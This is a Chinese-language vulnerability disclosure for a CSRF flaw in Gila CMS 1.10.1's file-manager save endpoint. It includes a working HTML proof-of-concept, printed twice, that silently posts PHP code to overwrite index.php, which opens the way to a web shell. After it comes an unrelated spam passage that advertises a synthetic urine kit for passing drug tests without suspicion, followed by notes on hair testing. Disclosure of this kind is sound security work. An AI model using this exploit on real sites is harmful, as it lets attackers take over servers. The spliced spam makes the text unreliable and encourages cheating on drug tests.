Gila CMS 1.10.1 CSRF 漏洞
一、漏洞摘要
漏洞名称: Gila CMS 1.10.1 CSRF 漏洞
上报日期: 2019-04-22
漏洞发现者: topsec_lizhongcheng
产品首页: https://gilacms.com
版本: V1.10.1
二、漏洞概述
后台修改文件处没有token验证,导致csrf漏洞的发生,构造对应的exp可导致getshell
文件:/src/core/controllers/fm.php
构造如下代码,保存为html文件并打开,将成功触发漏洞
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.3.21/gila-1.10.1/fm/save" method="POST">
<input type="hidden" name="contents" value="<?php /*!  * Gila CMS  * Copyright 2017-19 Vasileios Zoumpourlis  * Licensed under BSD 3-Clause License  */ phpinfo(); exit(); include 'src/core/bootstrap.php'; " />
<input type="hidden" name="path" value="index.php" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
构造如下代码,保存为html文件并打开,将成功触发漏洞
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.3.21/gila-1.10.1/fm/save" method="POST">
<input type="hidden" name="contents" value="<?php /*!  * Gila CMS  * Copyright 2017-19 Vasileios Zoumpourlis  * Licensed under BSD 3-Clause License  */ phpinfo(); exit(); include 'src/core/bootstrap.php'; " />
<input type="hidden" name="path" value="index.php" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Sample Preparation Pros Cons Customers feel the Incognito Belt synthetic urine kit is convenient and practical. They were amazed by how easily the device can drain the urine without causing any suspicion. Moreover, they feel the heating pads can raise the temperature quickly. So, the kit is ideal for tests on short notice. Lastly, since the urine is premixed, you do not have to take the time to prepare the solution. Synthetic urine kits are genuine, and they do work. However, finding a kit of the right quality can be tricky. Moreover, it is also crucial to focus on the storage of synthetic urine and maintain the temperature. That is why we have followed some stringent criteria to find you the most reliable brands. Hair tests can show drug use from a quarter of a year to five days before the test is taken. The concept behind hair drug testing is that drug metabolites penetrate the blood vessels of the scalp, where they are filtered and stored as a permanent record of a person’s drug consumption by the hair. Many individuals oppose hair monitoring, on the other hand, because it does not assess actual substance use. Since metabolites of the drug will linger in the hair for months after use, no amount of shampooing will be able to remove them. A person may have last used cannabis a few months ago and still be tested positive today. They are usually more time-consuming than other processes. Cannabis, opioids, PCP, methamphetamines, and cocaine use can all be detected with this test.
回复删除